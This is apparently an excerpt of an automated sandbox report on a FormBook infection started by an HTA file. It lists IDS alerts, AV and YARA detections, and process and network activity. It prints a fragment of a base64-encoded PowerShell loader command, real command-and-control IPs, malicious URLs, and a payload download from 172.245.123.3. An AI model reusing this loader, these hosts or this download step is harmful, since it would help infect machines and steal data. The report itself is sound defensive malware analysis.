WNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline", ProcessId: 1492, ProcessName: csc.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-05T05:38:53.469246+010028554651A Network Trojan was detected192.168.2.649821208.91.197.2780TCP
                  2024-12-05T05:39:18.701814+010028554651A Network Trojan was detected192.168.2.6498863.33.130.19080TCP
                  2024-12-05T05:39:33.432874+010028554651A Network Trojan was detected192.168.2.6499233.33.130.19080TCP
                  2024-12-05T05:39:48.442295+010028554651A Network Trojan was detected192.168.2.649963104.21.31.24980TCP
                  2024-12-05T05:40:03.279319+010028554651A Network Trojan was detected192.168.2.6499993.33.130.19080TCP
                  2024-12-05T05:40:18.370663+010028554651A Network Trojan was detected192.168.2.650009162.213.249.21680TCP
                  2024-12-05T05:40:33.261303+010028554651A Network Trojan was detected192.168.2.65001362.149.128.4080TCP
                  2024-12-05T05:40:47.944401+010028554651A Network Trojan was detected192.168.2.6500183.33.130.19080TCP
                  2024-12-05T05:41:02.765732+010028554651A Network Trojan was detected192.168.2.6500223.33.130.19080TCP
                  2024-12-05T05:41:18.279464+010028554651A Network Trojan was detected192.168.2.650026154.82.100.17780TCP
                  2024-12-05T05:41:53.689481+010028554651A Network Trojan was detected192.168.2.650031199.115.230.22280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-05T05:39:10.722550+010028554641A Network Trojan was detected192.168.2.6498633.33.130.19080TCP
                  2024-12-05T05:39:13.388616+010028554641A Network Trojan was detected192.168.2.6498703.33.130.19080TCP
                  2024-12-05T05:39:16.040314+010028554641A Network Trojan was detected192.168.2.6498763.33.130.19080TCP
                  2024-12-05T05:39:25.456038+010028554641A Network Trojan was detected192.168.2.6499033.33.130.19080TCP
                  2024-12-05T05:39:28.113587+010028554641A Network Trojan was detected192.168.2.6499103.33.130.19080TCP
                  2024-12-05T05:39:30.770847+010028554641A Network Trojan was detected192.168.2.6499173.33.130.19080TCP
                  2024-12-05T05:39:40.396437+010028554641A Network Trojan was detected192.168.2.649940104.21.31.24980TCP
                  2024-12-05T05:39:43.051583+010028554641A Network Trojan was detected192.168.2.649947104.21.31.24980TCP
                  2024-12-05T05:39:45.708858+010028554641A Network Trojan was detected192.168.2.649955104.21.31.24980TCP
                  2024-12-05T05:39:55.294162+010028554641A Network Trojan was detected192.168.2.6499773.33.130.19080TCP
                  2024-12-05T05:39:57.962029+010028554641A Network Trojan was detected192.168.2.6499843.33.130.19080TCP
                  2024-12-05T05:40:00.619088+010028554641A Network Trojan was detected192.168.2.6499913.33.130.19080TCP
                  2024-12-05T05:40:10.150210+010028554641A Network Trojan was detected192.168.2.650005162.213.249.21680TCP
                  2024-12-05T05:40:12.810690+010028554641A Network Trojan was detected192.168.2.650006162.213.249.21680TCP
                  2024-12-05T05:40:15.691616+010028554641A Network Trojan was detected192.168.2.650008162.213.249.21680TCP
                  2024-12-05T05:40:25.293933+010028554641A Network Trojan was detected192.168.2.65001062.149.128.4080TCP
                  2024-12-05T05:40:27.948398+010028554641A Network Trojan was detected192.168.2.65001162.149.128.4080TCP
                  2024-12-05T05:40:30.771520+010028554641A Network Trojan was detected192.168.2.65001262.149.128.4080TCP
                  2024-12-05T05:40:39.986732+010028554641A Network Trojan was detected192.168.2.6500143.33.130.19080TCP
                  2024-12-05T05:40:42.635660+010028554641A Network Trojan was detected192.168.2.6500153.33.130.19080TCP
                  2024-12-05T05:40:45.288783+010028554641A Network Trojan was detected192.168.2.6500163.33.130.19080TCP
                  2024-12-05T05:40:54.793403+010028554641A Network Trojan was detected192.168.2.6500193.33.130.19080TCP
                  2024-12-05T05:40:57.448428+010028554641A Network Trojan was detected192.168.2.6500203.33.130.19080TCP
                  2024-12-05T05:41:00.248282+010028554641A Network Trojan was detected192.168.2.6500213.33.130.19080TCP
                  2024-12-05T05:41:10.286313+010028554641A Network Trojan was detected192.168.2.650023154.82.100.17780TCP
                  2024-12-05T05:41:12.942530+010028554641A Network Trojan was detected192.168.2.650024154.82.100.17780TCP
                  2024-12-05T05:41:15.614420+010028554641A Network Trojan was detected192.168.2.650025154.82.100.17780TCP
                  2024-12-05T05:41:25.333244+010028554641A Network Trojan was detected192.168.2.650028199.115.230.22280TCP
                  2024-12-05T05:41:27.989483+010028554641A Network Trojan was detected192.168.2.650029199.115.230.22280TCP
                  2024-12-05T05:41:30.645739+010028554641A Network Trojan was detected192.168.2.650030199.115.230.22280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-05T05:37:58.770647+010028587951A Network Trojan was detected192.168.2.649707172.245.123.380TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://www.inastra.online/Toyota_Avensis.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK8Avira URL Cloud: Label: malware
                  Source: http://www.Inastra.onlineAvira URL Cloud: Label: malware
                  Source: http://www.yu12345.xyz/mnl8/Avira URL Cloud: Label: malware
                  Source: http://www.chalet-tofane.net/obbp/Avira URL Cloud: Label: malware
                  Source: http://www.inastra.online/Vintage_Car_Auctions.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNiAvira URL Cloud: Label: malware
                  Source: http://www.chalet-tofane.net:80/obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCXAvira URL Cloud: Label: malware
                  Source: http://www.chalet-tofane.net/obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCXFZjhm4RzxlyIFmCbk02gBov1+7TAel+jFtI3CD3Jdw5DP3HME6qP+mS3NVD/GMMnbyFe0QVN3VaJo=&Jr=tnaxxtxAvira URL Cloud: Label: malware
                  Source: http://www.yu12345.xyz/mnl8/?ZrE=RGOQJd/YEggQptEich3q6d0bfn/irFBnx+ZpwzxB5TUNCs3vZOAWTRyo0cim1/zDkhtz3OYESkByNsQcxwF9aubDKJHPAYECM7rOvY9yH/ydWUGi/0eSoW1GLP2ssLvhhZDeTZQ=&Jr=tnaxxtxAvira URL Cloud: Label: malware
                  Source: http://www.inastra.online/display.cfmAvira URL Cloud: Label: malware
                  Source: http://www.inastra.online/gbk4/?Jr=tnaxxtx&ZrE=Xcz/lKtmYzaclw33ohiXS7QV/Se8Pq+n4C+TPx5KwIQWTY7xXXdhlW/5Nf4u3/jcsrURWrDv59TKoDO7PIpn/ZUTTTwXyUNiXs6DylNi2YpMPJOOA+G6DJ3d/zRep1m17eaWMwM=Avira URL Cloud: Label: malware
                  Source: http://www.inastra.online/Toyota_F1.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2FlAvira URL Cloud: Label: malware
                  Source: http://www.inastra.online/Opel_Astra.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2FAvira URL Cloud: Label: malware
                  Source: http://www.inastra.online/__media__/js/trademark.php?d=inastra.online&type=nsAvira URL Cloud: Label: malware
                  Source: http://www.inastra.online/2019_Toyota_Land_Cruiser.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXAvira URL Cloud: Label: malware
                  Source: http://www.inastra.online/__media__/design/underconstructionnotice.php?d=inastra.onlineAvira URL Cloud: Label: malware
                  Source: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaReversingLabs: Detection: 18%
                  Source: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaVirustotal: Detection: 24%Perma Link
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Phishing

                  barindex
                  Source: Yara matchFile source: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta, type: SAMPLE
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2201321954.00000000079FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000008.00000002.2472760067.0000
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2472760067.00000000071D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ieUnAtt.pdbGCTL source: aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001561000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001542000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2603447181.0000000001561000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lSomfUdjbC.exe, 0000000C.00000002.4512336904.0000000000DFE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: ieUnAtt.pdb source: aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001561000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001542000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2603447181.0000000001561000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: q:C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.pdb source: powershell.exe, 00000003.00000002.2198089199.0000000005692000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2537409498.0000000004621000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2535339769.000000000447C000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2537409498.0000000004621000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2535339769.000000000447C000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.000000000479C000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4512419516.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002EF7C000.00000004.80000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2472760067.00000000071D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0293BFD0 FindFirstFileW,FindNextFileW,FindClose,14_2_0293BFD0

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 4x nop then xor eax, eax12_2_06C1EDD0
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 4x nop then pop edi12_2_06C2A086
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 4x nop then pop edi12_2_06C1B97B
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then xor eax, eax14_2_02929B10
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then pop edi14_2_0292DC87
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then mov ebx, 00000004h14_2_046C04E0

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.6:49707 -> 172.245.123.3:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49821 -> 208.91.197.27:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49863 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49870 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49876 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49886 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49903 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49917 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49910 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49923 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49940 -> 104.21.31.249:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49947 -> 104.21.31.249:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49977 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49955 -> 104.21.31.249:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49963 -> 104.21.31.249:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49984 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 62.149.128.40:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 62.149.128.40:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50009 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50022 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 62.149.128.40:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 199.115.230.222:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 199.115.230.222:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50018 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 154.82.100.177:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50026 -> 154.82.100.177:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 154.82.100.177:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50031 -> 199.115.230.222:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 199.115.230.222:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50013 -> 62.149.128.40:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 154.82.100.177:80
                  Source: DNS query: www.yu12345.xyz
                  Source: global trafficHTTP traffic detected: GET /784/CAMRRAM.txt HTTP/1.1Host: 172.245.123.3Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
                  Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
